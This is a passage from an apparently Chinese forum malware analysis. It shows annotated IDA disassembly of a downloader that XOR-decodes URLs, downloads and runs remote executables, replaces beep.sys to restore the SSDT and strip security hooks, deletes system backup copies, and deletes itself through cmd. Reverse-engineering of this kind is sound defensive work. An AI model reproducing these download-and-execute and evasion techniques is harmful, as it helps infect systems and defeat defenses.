unpacked:004022CD jmp loc_402384
unpacked:004022D2 ; ---------------------------------------------------------------------------
unpacked:004022D2
unpacked:004022D2 loc_4022D2: ; CODE XREF: Read_Overlay+1B2j
unpacked:004022D2 cmp [ebp+DstBuf], 59h
unpacked:004022D6 push 6Dh ; Size
unpacked:004022D8 push 0 ; Val
unpacked:004022DA setz al
unpacked:004022DD mov byte_404A0A, al
unpacked:004022E2 lea eax, [ebp+DstBuf]
unpacked:004022E5 push eax ; Dst
unpacked:004022E6 call memset
unpacked:004022EB push 2 ; Origin
unpacked:004022ED push 0FFFFFF34h ; Offset
unpacked:004022F2 push ebx ; File
unpacked:004022F3 call esi ; fseek
unpacked:004022F5 push ebx ; File
unpacked:004022F6 push 1 ; Count
unpacked:004022F8 lea eax, [ebp+DstBuf]
unpacked:004022FB push 1 ; ElementSize
unpacked:004022FD push eax ; DstBuf
unpacked:004022FE call edi ; fread
unpacked:00402300 add esp, 28h
unpacked:00402303 test eax, eax
unpacked:00402305 jnz short loc_40230E
unpacked:00402307 push offset aFopenCannTRe_2 ; "fopen cann't read data.. /delself "
unpacked:0040230C jmp short loc_402384
unpacked:0040230E ; ---------------------------------------------------------------------------
unpacked:0040230E
unpacked:0040230E loc_40230E: ; CODE XREF: Read_Overlay+1F1j
unpacked:0040230E cmp [ebp+DstBuf], 59h
unpacked:00402312 push 6Dh ; Size
unpacked:00402314 push 0 ; Val
unpacked:00402316 setz al
unpacked:00402319 mov byte_404A09, al
unpacked:0040231E lea eax, [ebp+DstBuf]
unpacked:00402321 push eax ; Dst
unpacked:00402322 call memset
unpacked:00402327 push 2 ; Origin
unpacked:00402329 push 0FFFFFF35h ; Offset
unpacked:0040232E push ebx ; File
unpacked:0040232F call esi ; fseek
unpacked:00402331 push ebx ; File
unpacked:00402332 push 1 ; Count
unpacked:00402334 lea eax, [ebp+DstBuf]
unpacked:00402337 push 1 ; ElementSize
unpacked:00402339 push eax ; DstBuf
unpacked:0040233A call edi ; fread
unpacked:0040233C add esp, 28h
unpacked:0040233F test eax, eax
unpacked:00402341 jnz short loc_40234A
unpacked:00402343 push offset aFopenCannTRe_3 ; "fopen cann't read data.. /isWebGet "
unpacked:00402348 jmp short loc_402384
unpacked:0040234A ; ---------------------------------------------------------------------------
unpacked:0040234A
unpacked:0040234A loc_40234A: ; CODE XREF: Read_Overlay+22Dj
unpacked:0040234A cmp [ebp+DstBuf], 59h
unpacked:0040234E push 6Dh ; Size
unpacked:00402350 push 0 ; Val
unpacked:00402352 setz al
unpacked:00402355 mov byte_404A08, al
unpacked:0040235A lea eax, [ebp+DstBuf]
unpacked:0040235D push eax ; Dst
unpacked:0040235E call memset
unpacked:00402363 push 2 ; Origin
unpacked:00402365 push 0FFFFFF36h ; Offset
unpacked:0040236A push ebx ; File
unpacked:0040236B call esi ; fseek
unpacked:0040236D push ebx ; File
unpacked:0040236E push 1 ; Count
unpacked:00402370 lea eax, [ebp+DstBuf]
unpacked:00402373 push 6Dh ; ElementSize
unpacked:00402375 push eax ; DstBuf
unpacked:00402376 call edi ; fread
unpacked:00402378 add esp, 28h
unpacked:0040237B test eax, eax
unpacked:0040237D jnz short loc_40238E
unpacked:0040237F push offset aFopenCannTRe_4 ; "fopen cann't read data.. /szURL "
unpacked:00402384
unpacked:00402384 loc_402384: ; CODE XREF: Read_Overlay+3Fj
unpacked:00402384 ; Read_Overlay+63j
unpacked:00402384 ; Read_Overlay+A3j
unpacked:00402384 ; Read_Overlay+12Fj
unpacked:00402384 ; Read_Overlay+17Aj
unpacked:00402384 ; Read_Overlay+1B9j
unpacked:00402384 ; Read_Overlay+1F8j
unpacked:00402384 ; Read_Overlay+234j
unpacked:00402384 call OutputDebugStringA
unpacked:0040238A xor al, al
unpacked:0040238C jmp short loc_4023A8
unpacked:0040238E ; ---------------------------------------------------------------------------
unpacked:0040238E
unpacked:0040238E loc_40238E: ; CODE XREF: Read_Overlay+269j
unpacked:0040238E lea eax, [ebp+DstBuf]
unpacked:00402391 push eax
unpacked:00402392 push offset byte_4049A4
unpacked:00402397 call _mbscpy
unpacked:0040239C push ebx ; File
unpacked:0040239D call fclose
unpacked:004023A3 add esp, 0Ch
unpacked:004023A6 mov al, 1
unpacked:004023A8
unpacked:004023A8 loc_4023A8: ; CODE XREF: Read_Overlay+278j
unpacked:004023A8 pop edi
unpacked:004023A9 pop esi
unpacked:004023AA pop ebx
unpacked:004023AB leave
unpacked:004023AC retn
unpacked:004023AC Read_Overlay endp
//URL解密call
unpacked:00401ED7 DecodeURL proc near ; CODE XREF: WinMain(x,x,x,x)+239p
unpacked:00401ED7
unpacked:00401ED7 str = dword ptr 4
unpacked:00401ED7 key = byte ptr 8
unpacked:00401ED7
unpacked:00401ED7 push esi
unpacked:00401ED8 mov esi, [esp+4+str]
unpacked:00401EDC xor edx, edx
unpacked:00401EDE mov al, [esi]
unpacked:00401EE0 test al, al
unpacked:00401EE2 jz short loc_401EF9
unpacked:00401EE4 mov ecx, esi
unpacked:00401EE6
unpacked:00401EE6 loc_401EE6: ; CODE XREF: DecodeURL+20j
unpacked:00401EE6 sub al, dl
unpacked:00401EE8 xor al, [esp+4+key] ; 简单的异或解密(或加密).
unpacked:00401EEC inc edx
unpacked:00401EED mov [ecx], al
unpacked:00401EEF mov al, [edx+esi]
unpacked:00401EF2 lea ecx, [edx+esi]
unpacked:00401EF5 test al, al
unpacked:00401EF7 jnz short loc_401EE6 ; 遇'\0'结束 .
unpacked:00401EF9
unpacked:00401EF9 loc_401EF9: ; CODE XREF: DecodeURL+Bj
unpacked:00401EF9 mov eax, esi
unpacked:00401EFB pop esi
unpacked:00401EFC retn
unpacked:00401EFC DecodeURL endp
//线程函数,为每个下载地址单独建立一个线程
unpacked:004019ED ; 线程函数, 对于每个远程exe url建立一个线程进行下载并执行.
unpacked:004019ED ; Attributes: bp-based frame
unpacked:004019ED
unpacked:004019ED ; DWORD __stdcall ThreadProc(LPVOID)
unpacked:004019ED ThreadProc proc near ; DATA XREF: WinMain(x,x,x,x)+37Fo
unpacked:004019ED
unpacked:004019ED DownAddr = byte ptr -104h
unpacked:004019ED lpOutputString= dword ptr 8
unpacked:004019ED
unpacked:004019ED push ebp
unpacked:004019EE mov ebp, esp
unpacked:004019F0 sub esp, 104h
unpacked:004019F6 push esi
unpacked:004019F7 push edi
unpacked:004019F8 xor edi, edi
unpacked:004019FA push 104h ; Size
unpacked:004019FF lea eax, [ebp+DownAddr] ; 这个事下载的地址, 由CreateThread作为参数传件来的.
unpacked:00401A05 push edi ; Val
unpacked:00401A06 push eax ; Dst
unpacked:00401A07 call memset
unpacked:00401A0C lea eax, [ebp+DownAddr]
unpacked:00401A12 push offset aCProgra1 ; "c:\\Progra~1\\"
unpacked:00401A17 push eax
unpacked:00401A18 call _mbscpy
unpacked:00401A1D add esp, 14h
unpacked:00401A20 push 9 ; Count
unpacked:00401A22 call GetRandomStr ; 得到一个随机的文件名.
unpacked:00401A27 push eax ; Source
unpacked:00401A28 lea eax, [ebp+DownAddr]
unpacked:00401A2E push eax ; Dest
unpacked:00401A2F call strncat
unpacked:00401A35 lea eax, [ebp+DownAddr]
unpacked:00401A3B push offset a_exe ; ".exe"
unpacked:00401A40 push eax
unpacked:00401A41 call _mbscat ; 连上".exe"后缀.
unpacked:00401A46 mov esi, OutputDebugStringA
unpacked:00401A4C add esp, 14h
unpacked:00401A4F push [ebp+lpOutputString] ; lpOutputString
unpacked:00401A52 call esi ; OutputDebugStringA
unpacked:00401A54 lea eax, [ebp+DownAddr]
unpacked:00401A5A push eax ; lpOutputString
unpacked:00401A5B call esi ; OutputDebugStringA
unpacked:00401A5D push edi ; LPBINDSTATUSCALLBACK
unpacked:00401A5E lea eax, [ebp+DownAddr]
unpacked:00401A64 push edi ; DWORD
unpacked:00401A65 push eax ; LPCSTR
unpacked:00401A66 push [ebp+lpOutputString] ; LPCSTR
unpacked:00401A69 push edi ; LPUNKNOWN
unpacked:00401A6A call URLDownloadToFileA ; 下载文件.
unpacked:00401A6F push edi ; nShowCmd
unpacked:00401A70 push edi ; lpDirectory
unpacked:00401A71 lea eax, [ebp+DownAddr]
unpacked:00401A77 push edi ; lpParameters
unpacked:00401A78 push eax ; lpFile
unpacked:00401A79 push offset Operation ; "open"
unpacked:00401A7E push edi ; hwnd
unpacked:00401A7F call ShellExecuteA ; 执行EXE文件.
unpacked:00401A85 lea eax, [ebp+DownAddr]
unpacked:00401A8B push eax ; lpFileName
unpacked:00401A8C call DeleteFileA
unpacked:00401A92 pop edi
unpacked:00401A93 xor eax, eax
unpacked:00401A95 pop esi
unpacked:00401A96 leave
unpacked:00401A97 retn 4
unpacked:00401A97 ThreadProc endp
//随机字符串生成call(用于命名下载后的exe文件)
unpacked:00401962 ; 返回一个随机字符串,在OD中看效果.
unpacked:00401962
unpacked:00401962 GetRandomStr proc near ; CODE XREF: ThreadProc+35p
unpacked:00401962 push ebx
unpacked:00401963 push esi
unpacked:00401964 push edi
unpacked:00401965 call timeGetTime ; 做种子.
unpacked:0040196B push eax ; Seed
unpacked:0040196C call srand
unpacked:00401972 mov ebx, rand
unpacked:00401978 call ebx ; rand
unpacked:0040197A push 0Ah ; %10 , 控制随机数在0到9之间.
unpacked:0040197C cdq
unpacked:0040197D pop ecx
unpacked:0040197E idiv ecx
unpacked:00401980 inc edx
unpacked:00401981
unpacked:00401981 loc_401981: ; DATA XREF: unpacked:0040A0EBo
unpacked:00401981 push edx ; unsigned int
unpacked:00401982 call ??2@YAPAXI@Z ; operator new(uint)
unpacked:00401987 pop ecx
unpacked:00401988 mov edi, eax
unpacked:0040198A pop ecx
unpacked:0040198B
unpacked:0040198B loc_40198B: ; DATA XREF: unpacked:0040A0EFo
unpacked:0040198B xor esi, esi
unpacked:0040198D
unpacked:0040198D loc_40198D: ; CODE XREF: GetRandomStr+47j
unpacked:0040198D call ebx ; rand
unpacked:0040198F push 34h
unpacked:00401991 cdq
unpacked:00401992 pop ecx
unpacked:00401993 idiv ecx
unpacked:00401995 cmp edx, 1Ah ; 除以52的余数在和26判断.
unpacked:00401998 jge short loc_40199F
unpacked:0040199A add dl, 41h ; 小于26则加'A'
unpacked:0040199D jmp short loc_4019A2
unpacked:0040199F ; ---------------------------------------------------------------------------
unpacked:0040199F
unpacked:0040199F loc_40199F: ; CODE XREF: GetRandomStr+36j
unpacked:0040199F add dl, 47h ; 这里其实是这样的:-6 + 'a' . 他的目的是为了生成字母.
unpacked:004019A2
unpacked:004019A2 loc_4019A2: ; CODE XREF: GetRandomStr+3Bj
unpacked:004019A2 mov [esi+edi], dl
unpacked:004019A5 inc esi
unpacked:004019A6 cmp esi, 9
unpacked:004019A9 jl short loc_40198D
unpacked:004019AB mov eax, edi
unpacked:004019AD pop edi
unpacked:004019AE pop esi
unpacked:004019AF pop ebx
unpacked:004019B0 retn
unpacked:004019B0 GetRandomStr endp
//恢复SSDT
unpacked:00401927
unpacked:00401927 ; int __cdecl Start_ReSSDT(HMODULE hModule)
unpacked:00401927 Start_ReSSDT proc near ; CODE XREF: WinMain(x,x,x,x)+8Dp
unpacked:00401927
unpacked:00401927 var_8 = dword ptr -8
unpacked:00401927 hModule = dword ptr 4
unpacked:00401927
unpacked:00401927 push esi
unpacked:00401928 push [esp+4+hModule] ; hModule
unpacked:0040192C call LoadDriver ; 第一步:加载驱动.
unpacked:00401931 mov esi, eax
unpacked:00401933 pop ecx
unpacked:00401934
unpacked:00401934 loc_401934: ; DATA XREF: unpacked:0040A0E7o
unpacked:00401934 cmp esi, 0FFFFFFFFh
unpacked:00401937 jnz short loc_401950
unpacked:00401939 push eax ; NumberOfBytesWritten
unpacked:0040193A call UnLoadDriver
unpacked:0040193F mov [esp+8+var_8], offset aLoaddriverFail ; "LoadDriver failed -- hDriver null || in"...
unpacked:00401946 call OutputDebugStringA
unpacked:0040194C xor al, al
unpacked:0040194E pop esi
unpacked:0040194F retn
unpacked:00401950 ; ---------------------------------------------------------------------------
unpacked:00401950
unpacked:00401950 loc_401950: ; CODE XREF: Start_ReSSDT+10j
unpacked:00401950 push esi ; hDevice
unpacked:00401951 call ReSSDT ; 关键函数
unpacked:00401956 push esi ; NumberOfBytesWritten
unpacked:00401957 call UnLoadDriver ; 第三步:卸载驱动. 上面就是最重要的恢复.
unpacked:0040195C pop ecx
unpacked:0040195D mov al, 1
unpacked:0040195F pop ecx
unpacked:00401960 pop esi
unpacked:00401961 retn
unpacked:00401961 Start_ReSSDT endp
unpacked:00401961
//来看下里面的关键函数ReSSDT:
unpacked:004013C1
unpacked:004013C1 ; 这个函数某些部分我还不是很懂, 不过肯定是恢复SSDT表这是没错的,
unpacked:004013C1 ; 貌似是这样的过程:(不当之处谢谢指正.)
unpacked:004013C1 ; 从ntdll中得到NtQuerySystemInformation函数的地址,然后进行一些查询
unpacked:004013C1 ; 工作确定系统类型, 再使用LoadlibraryEx装载适当的核心文件
unpacked:004013C1 ; (如ntoskrnl.exe),因为静态物理文件是干净的,没有被Hook的. 然后得到
unpacked:004013C1 ; 其被导出的符号keServiceDecriptor的地址, 再减去其装载基址,即可得
unpacked:004013C1 ; 到偏移,通过这个偏移即可定位到原SSDT表,然后使用文件中的SSDT表对
unpacked:004013C1 ; 被Hook了的SSDT表进行恢复.
unpacked:004013C1 ; Attributes: bp-based frame
unpacked:004013C1
unpacked:004013C1 ; int __cdecl ReSSDT(HANDLE hDevice)
unpacked:004013C1 ReSSDT proc near ; CODE XREF: Start_ReSSDT+2Ap
unpacked:004013C1
unpacked:004013C1 var_20 = byte ptr -20h
unpacked:004013C1 var_1C = byte ptr -1Ch
unpacked:004013C1 BytesReturned= dword ptr -18h
unpacked:004013C1 var_14 = dword ptr -14h
unpacked:004013C1 var_10 = dword ptr -10h
unpacked:004013C1 dwBytes = dword ptr -0Ch
unpacked:004013C1 InBuffer = byte ptr -8
unpacked:004013C1 hMem = dword ptr -4
unpacked:004013C1 hDevice = dword ptr 8
unpacked:004013C1
unpacked:004013C1 push ebp
unpacked:004013C2 mov ebp, esp
unpacked:004013C4 sub esp, 20h
unpacked:004013C7 push ebx
unpacked:004013C8 push esi
unpacked:004013C9 push edi
unpacked:004013CA lea eax, [ebp+hMem]
unpacked:004013CD xor ebx, ebx
unpacked:004013CF push offset ProcName ; "NtQuerySystemInformation"
unpacked:004013D4 push offset ModuleName ; "ntdll.dll"
unpacked:004013D9 mov [ebp+hMem], eax
unpacked:004013DC mov dword ptr [ebp+InBuffer], ebx
unpacked:004013DF call GetModuleHandleA
unpacked:004013E5 mov esi, GetProcAddress
unpacked:004013EB push eax ; hModule
unpacked:004013EC call esi ; GetProcAddress
unpacked:004013EE mov edi, eax ; 这里得到NtQuerySystemInformation的地址.
unpacked:004013F0 cmp edi, ebx
unpacked:004013F2 jnz short loc_4013FE
unpacked:004013F4 push offset aError_info ; "NtQuerySystemInformationAddr =NULL ."
unpacked:004013F9 jmp loc_4014F3
unpacked:004013FE ; ---------------------------------------------------------------------------
unpacked:004013FE
unpacked:004013FE loc_4013FE: ; CODE XREF: ReSSDT+31j
unpacked:004013FE lea eax, [ebp+dwBytes]
unpacked:00401401 push eax
unpacked:00401402 push 4
unpacked:00401404 push [ebp+hMem]
unpacked:00401407 push 0Bh
unpacked:00401409 call edi ; call NtQuerySystemInformation.
unpacked:0040140B cmp eax, 0C0000004h
unpacked:00401410 jnz loc_4014EE
unpacked:00401416 push [ebp+dwBytes] ; dwBytes
unpacked:00401419 push 40h ; uFlags
unpacked:0040141B call GlobalAlloc
unpacked:00401421 push ebx
unpacked:00401422 mov [ebp+hMem], eax
unpacked:00401425 push [ebp+dwBytes]
unpacked:00401428
unpacked:00401428 loc_401428: ; DATA XREF: unpacked:004121C4o
unpacked:00401428 push eax
unpacked:00401429 push 0Bh
unpacked:0040142B call edi
unpacked:0040142D test eax, eax
unpacked:0040142F jge short loc_40143B
unpacked:00401431 push offset aNt_successRcRe ; "NT_SUCCESS(rc) return False"
unpacked:00401436 jmp loc_4014F3
unpacked:0040143B ; ---------------------------------------------------------------------------
unpacked:0040143B
unpacked:0040143B loc_40143B: ; CODE XREF: ReSSDT+6Ej
unpacked:0040143B mov eax, [ebp+hMem]
unpacked:0040143E push 1 ; dwFlags
unpacked:00401440 push ebx ; hFile
unpacked:00401441 mov ecx, [eax+0Ch]
unpacked:00401444 mov [ebp+var_14], ecx
unpacked:00401447 movzx ecx, word ptr [eax+1Eh]
unpacked:0040144B lea eax, [ecx+eax+20h]
unpacked:0040144F push eax ; lpLibFileName
unpacked:00401450 call LoadLibraryExA
unpacked:00401456 mov edi, eax
unpacked:00401458 cmp edi, ebx
unpacked:0040145A jnz short loc_401466
unpacked:0040145C push offset aHkernelNull_ ; "hKernel Null ."
unpacked:00401461 jmp loc_4014F3
unpacked:00401466 ; ---------------------------------------------------------------------------
unpacked:00401466
unpacked:00401466 loc_401466: ; CODE XREF: ReSSDT+99j
unpacked:00401466 push [ebp+hMem] ; hMem
unpacked:00401469 call GlobalFree
unpacked:0040146F push offset aKeservicedescr ; "KeServiceDescriptorTable"
unpacked:00401474 push edi ; hModule
unpacked:00401475 call esi ; GetProcAddress
unpacked:00401477 cmp eax, ebx
unpacked:00401479 jnz short loc_401482
unpacked:0040147B push offset aGetKeservicede ; "Get KeServiceDescriptorTable addr falie"...
unpacked:00401480 jmp short loc_4014F3
unpacked:00401482 ; ---------------------------------------------------------------------------
unpacked:00401482
unpacked:00401482 loc_401482: ; CODE XREF: ReSSDT+B8j
unpacked:00401482 sub eax, edi
unpacked:00401484 push eax
unpacked:00401485 push edi
unpacked:00401486 call FindKiServiceTable ; 这个函数看起来乱七八糟的,不知道在干什么,不过从交叉参考处的
unpacked:00401486 ; 注释会马上发现它是在找KiServiceTable的地址.而且是通过返回值
unpacked:00401486 ; 来传递KiServiceTable地址.
unpacked:0040148B mov esi, eax
unpacked:0040148D pop ecx
unpacked:0040148E cmp esi, ebx
unpacked:00401490 pop ecx
unpacked:00401491 jnz short loc_40149A
unpacked:00401493 push offset aFindkiservicet ; "FindKiServiceTable falied."
unpacked:00401498 jmp short loc_4014F3
unpacked:0040149A ; ---------------------------------------------------------------------------
unpacked:0040149A
unpacked:0040149A loc_40149A: ; CODE XREF: ReSSDT+D0j
unpacked:0040149A lea eax, [ebp+var_1C]
unpacked:0040149D push eax
unpacked:0040149E lea eax, [ebp+var_10]
unpacked:004014A1 push eax
unpacked:004014A2 lea eax, [ebp+var_20]
unpacked:004014A5 push eax
unpacked:004014A6 push edi
unpacked:004014A7 call Get_PE_Headers ; 得到PE驱动文件的PE头及区段表的相关信息.
unpacked:004014AC add esp, 10h
unpacked:004014AF add esi, edi
unpacked:004014B1
unpacked:004014B1 loc_4014B1: ; CODE XREF: ReSSDT+122j
unpacked:004014B1 mov edx, [ebp+var_10]
unpacked:004014B4 mov ecx, [esi]
unpacked:004014B6 mov ebx, ecx
unpacked:004014B8 sub ebx, [edx+1Ch]
unpacked:004014BB lea eax, [edx+1Ch]
unpacked:004014BE cmp ebx, [edx+38h]
unpacked:004014C1 jnb short loc_4014E5
unpacked:004014C3 sub ecx, [eax]
unpacked:004014C5 lea eax, [ebp+BytesReturned]
unpacked:004014C8 push eax ; LPVOID
unpacked:004014C9 push dword ptr [ebp+InBuffer] ; char
unpacked:004014CC add ecx, [ebp+var_14]
unpacked:004014CF push [ebp+hDevice] ; hDevice
unpacked:004014D2 mov [ebp+BytesReturned], ecx
unpacked:004014D5 call ResetServiceAddr ; 这个用于对某一个被HOOK了的服务函数进行恢复的.
unpacked:004014DA add esp, 0Ch
unpacked:004014DD add esi, 4
unpacked:004014E0 inc dword ptr [ebp+InBuffer]
unpacked:004014E3 jmp short loc_4014B1
unpacked:004014E5 ; ---------------------------------------------------------------------------
unpacked:004014E5
unpacked:004014E5 loc_4014E5: ; CODE XREF: ReSSDT+100j
unpacked:004014E5 push edi ; hLibModule
unpacked:004014E6 call FreeLibrary
unpacked:004014EC jmp short loc_4014F9
unpacked:004014EE ; ---------------------------------------------------------------------------
unpacked:004014EE
unpacked:004014EE loc_4014EE: ; CODE XREF: ReSSDT+4Fj
unpacked:004014EE push offset aRcStatus_info_ ; "rc!=STATUS_INFO_LENGTH_MISMATCH."
unpacked:004014F3
unpacked:004014F3 loc_4014F3: ; CODE XREF: ReSSDT+38j
unpacked:004014F3 ; ReSSDT+75j ReSSDT+A0j
unpacked:004014F3 ; ReSSDT+BFj ReSSDT+D7j
unpacked:004014F3 call OutputDebugStringA
unpacked:004014F9
unpacked:004014F9 loc_4014F9: ; CODE XREF: ReSSDT+12Bj
unpacked:004014F9 pop edi
unpacked:004014FA pop esi
unpacked:004014FB pop ebx
unpacked:004014FC leave
unpacked:004014FD retn
unpacked:004014FD ReSSDT endp
//我们来看下加载驱动的部分. (作者使用的是被用烂了的驱动替换)
unpacked:004016F7 push ebp
unpacked:004016F8 mov ebp, esp
unpacked:004016FA sub esp, 138h
unpacked:00401700 and byte_404B80, 0
unpacked:00401707 and [ebp+var_23], 0
unpacked:0040170B push esi
unpacked:0040170C push edi
unpacked:0040170D push offset ServiceName ; lpServiceName
unpacked:00401712 mov ServiceName, 42h
unpacked:00401719 mov byte_404B7D, 65h
unpacked:00401720 mov byte_404B7E, 65h
unpacked:00401727 mov byte_404B7F, 70h ; 这里是"Beep"
unpacked:0040172E mov [ebp+var_34], 5Ch
unpacked:00401732 mov [ebp+var_33], 44h
unpacked:00401736 mov [ebp+var_32], 72h
unpacked:0040173A mov [ebp+var_31], 69h
unpacked:0040173E mov [ebp+var_30], 76h
unpacked:00401742 mov [ebp+var_2F], 65h
unpacked:00401746 mov [ebp+var_2E], 72h
unpacked:0040174A mov [ebp+var_2D], 73h
unpacked:0040174E mov [ebp+var_2C], 5Ch ; 这些mov其实是赋值字符串.这里是Drivers\beep.sys,
unpacked:0040174E ; 显然为臭名昭著的驱动替换.这样在代码中赋值字符串
unpacked:0040174E ; 可以起到一定得免杀作用.
unpacked:0040174E ;
unpacked:00401752 mov [ebp+var_2B], 62h
unpacked:00401756 mov [ebp+var_2A], 65h
unpacked:0040175A mov [ebp+var_29], 65h
unpacked:0040175E mov [ebp+var_28], 70h
unpacked:00401762 mov [ebp+var_27], 2Eh
unpacked:00401766 mov [ebp+var_26], 73h
unpacked:0040176A mov [ebp+var_25], 79h
unpacked:0040176E mov [ebp+var_24], 73h
unpacked:00401772 call StopService ; 停止原来的系统服务, 因为要进行肮脏的驱动替换.
unpacked:00401777 test al, al
unpacked:00401779 pop ecx
unpacked:0040177A jnz short loc_40178F
unpacked:0040177C push offset aStopserviceFai ; "StopService failed in LoadDirv."
unpacked:00401781 call OutputDebugStringA
unpacked:00401787 or eax, 0FFFFFFFFh
unpacked:0040178A jmp loc_4018AC
unpacked:0040178F ; ---------------------------------------------------------------------------
unpacked:0040178F
unpacked:0040178F loc_40178F: ; CODE XREF: LoadDriver+83j
unpacked:0040178F and [ebp+FileName], 0
unpacked:00401796 push ebx
unpacked:00401797 push 40h
unpacked:00401799 xor eax, eax
unpacked:0040179B pop ecx
unpacked:0040179C lea edi, [ebp+var_137]
unpacked:004017A2 rep stosd
unpacked:004017A4 stosw
unpacked:004017A6 stosb
unpacked:004017A7 mov edi, GetSystemDirectoryA
unpacked:004017AD mov esi, 104h
unpacked:004017B2 lea eax, [ebp+FileName]
unpacked:004017B8 push esi ; uSize
unpacked:004017B9 push eax ; lpBuffer
unpacked:004017BA call edi ; GetSystemDirectoryA
unpacked:004017BC lea eax, [ebp+FileName]
unpacked:004017C2 push offset aDllcacheBeep_s ; "\\dllcache\\beep.sys"
unpacked:004017C7 push eax
unpacked:004017C8 call _mbscat
unpacked:004017CD mov ebx, DeleteFileA
unpacked:004017D3 pop ecx
unpacked:004017D4 pop ecx
unpacked:004017D5 lea eax, [ebp+FileName]
unpacked:004017DB push eax ; lpFileName
unpacked:004017DC call ebx ; DeleteFileA ; 删掉dllcache中的备份文件 .防止替换失败. 原来dllcache这个目录里面还有备份.
unpacked:004017DE push esi ; Size
unpacked:004017DF lea eax, [ebp+FileName]
unpacked:004017E5 push 0 ; Val
unpacked:004017E7 push eax ; Dst
unpacked:004017E8 call memset
unpacked:004017ED add esp, 0Ch
unpacked:004017F0 lea eax, [ebp+FileName]
unpacked:004017F6 push esi ; uSize
unpacked:004017F7 push eax ; lpBuffer
unpacked:004017F8 call GetWindowsDirectoryA
unpacked:004017FE lea eax, [ebp+FileName]
unpacked:00401804 push offset aDriverCacheI38 ; "\\Driver Cache\\i386\\driver.cab"
unpacked:00401809 push eax
unpacked:0040180A call _mbscat
unpacked:0040180F pop ecx
unpacked:00401810 lea eax, [ebp+FileName]
unpacked:00401816 pop ecx
unpacked:00401817 push eax ; lpFileName
unpacked:00401818 call ebx ; DeleteFileA ; 按程序的意图, 貌似这个driver.cab也备份了那个beep.sys
unpacked:0040181A push esi ; uSize
unpacked:0040181B mov esi, offset FileName
unpacked:00401820 push esi ; lpBuffer
unpacked:00401821 call edi ; GetSystemDirectoryA
unpacked:00401823 lea eax, [ebp+var_34]
unpacked:00401826 push eax
unpacked:00401827 push esi
unpacked:00401828 call lstrcat
unpacked:0040182E push 80h ; dwFileAttributes
unpacked:00401833 push esi ; lpFileName
unpacked:00401834 call SetFileAttributesA
unpacked:0040183A push offset nNumberOfBytesToWrite ; NumberOfBytesRead
unpacked:0040183F push esi ; lpFileName
unpacked:00401840 call GetBufffromFile ; 文件数据读到一个缓冲区, 并返回指针.
unpacked:00401845 pop ecx
unpacked:00401846 xor edi, edi
unpacked:00401848 cmp nNumberOfBytesToWrite, edi
unpacked:0040184E pop ecx
unpacked:0040184F mov lpBuffer, eax
unpacked:00401854 pop ebx
unpacked:00401855 jz short loc_401892
unpacked:00401857 push esi ; lpFileName
unpacked:00401858 push offset aSys ; "SYS"
unpacked:0040185D push 87h ; lpBuffer
unpacked:00401862 push [ebp+hModule] ; hModule
unpacked:00401865 call ReleaseRes_2 ; 释放恶意驱动---以恢复SSDT
unpacked:0040186A add esp, 10h
unpacked:0040186D test eax, eax
unpacked:0040186F jnz short loc_401878
unpacked:00401871 push offset aModifyfromreso ; "ModifyFromResource falied."
unpacked:00401876 jmp short loc_40188C
unpacked:00401878 ; ---------------------------------------------------------------------------
unpacked:00401878
unpacked:00401878 loc_401878: ; CODE XREF: LoadDriver+178j
unpacked:00401878 push offset ServiceName ; lpServiceName
unpacked:0040187D call StartService ; 替换完毕, 启动我们的服务, 准备恢复SSDT表.
unpacked:00401882 test al, al
unpacked:00401884 pop ecx
unpacked:00401885 jnz short loc_401896
unpacked:00401887 push offset aStartserviceFa ; "StartService failed in LoadDirv."
unpacked:0040188C
unpacked:0040188C loc_40188C: ; CODE XREF: LoadDriver+17Fj
unpacked:0040188C call OutputDebugStringA
unpacked:00401892
unpacked:00401892 loc_401892: ; CODE XREF: LoadDriver+15Ej
unpacked:00401892 xor eax, eax
unpacked:00401894 jmp short loc_4018AC
unpacked:00401896 ; ---------------------------------------------------------------------------
unpacked:00401896
unpacked:00401896 loc_401896: ; CODE XREF: LoadDriver+18Ej
unpacked:00401896 push edi ; hTemplateFile
unpacked:00401897 push edi ; dwFlagsAndAttributes
unpacked:00401898 push 3 ; dwCreationDisposition
unpacked:0040189A push edi ; lpSecurityAttributes
unpacked:0040189B push edi ; dwShareMode
unpacked:0040189C push 0C0000000h ; dwDesiredAccess
unpacked:004018A1 push offset a_Ressdtdos ; "\\\\.\\RESSDTDOS"
unpacked:004018A6
unpacked:004018A6 loc_4018A6: ; DATA XREF: unpacked:0040A0DFo
unpacked:004018A6 call CreateFileA ; 打开设备.进行通信
... ...
-------------------------------------------------------------------------------------------------------------------------------
关于SSDT恢复部分的, 这里就不多贴了, 免得占版面. (我会在附件中打包idb文件)
我们再看其他的部分.
---------------
进程注射作者使用的是最简单的dll远程线程注射. 没什么新意, 我就不贴反汇编代码了.
自删除部分也是使用的最常用的方法,通过创建一个cmd进程,并设置进程优先级来达到目的. 如下:
... ...
unpacked:00401100 mov esi, 104h
unpacked:00401105 lea eax, [ebp+szLongPath]
unpacked:0040110B push esi ; nSize
unpacked:0040110C push eax ; lpFilename
unpacked:0040110D push 0 ; hModule
unpacked:0040110F call GetModuleFileNameA
unpacked:00401115 test eax, eax
unpacked:00401117 jz loc_4011F4
unpacked:0040111D lea eax, [ebp+szLongPath]
unpacked:00401123 push esi ; cchBuffer
unpacked:00401124 push eax ; lpszShortPath
unpacked:00401125 lea eax, [ebp+szLongPath]
unpacked:0040112B push eax ; lpszLongPath
unpacked:0040112C call GetShortPathNameA
unpacked:00401132 test eax, eax
unpacked:00401134 jz loc_4011F4
unpacked:0040113A lea eax, [ebp+Buffer]
unpacked:00401140 push esi ; nSize
unpacked:00401141 push eax ; lpBuffer
unpacked:00401142 push offset Name ; "COMSPEC"
unpacked:00401147 call GetEnvironmentVariableA
unpacked:0040114D test eax, eax
unpacked:0040114F jz loc_4011F4
unpacked:00401155 lea eax, [ebp+var_244]
unpacked:0040115B push offset aCDel ; "/c del "
unpacked:00401160 push eax
unpacked:00401161 call lstrcpy
unpacked:00401167 mov esi, lstrcat
unpacked:0040116D lea eax, [ebp+szLongPath]
unpacked:00401173 push eax
unpacked:00401174 lea eax, [ebp+var_244]
unpacked:0040117A push eax
unpacked:0040117B call esi ; lstrcat
unpacked:0040117D lea eax, [ebp+var_244]
unpacked:00401183 push offset aNul ; " > nul"
unpacked:00401188 push eax
unpacked:00401189 call esi ; lstrcat
unpacked:0040118B lea eax, [ebp+Buffer]
unpacked:00401191 and [ebp+var_34], 0
unpacked:00401195 and [ebp+var_24], 0
unpacked:00401199 and [ebp+var_20], 0
unpacked:0040119D mov [ebp+var_2C], eax
unpacked:004011A0 lea eax, [ebp+var_244]
